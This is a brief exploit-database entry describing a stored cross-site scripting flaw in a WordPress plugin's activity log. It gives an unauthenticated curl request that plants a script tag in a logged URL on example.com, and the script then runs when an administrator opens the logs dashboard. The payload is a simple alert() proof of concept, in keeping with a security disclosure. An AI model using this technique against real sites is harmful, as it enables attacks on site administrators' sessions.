Share
## https://sploitus.com/exploit?id=WPEX-ID:743C4D79-E1D5-4FB0-A17D-296DF2C54E8A
As unauthenticated: curl 'https://example.com/<script>alert(`XSS`)</script>'

The XSS will be triggered when an admin visit the logs dashboard: https://example.com/wp-admin/admin.php?page=coreactivity-logs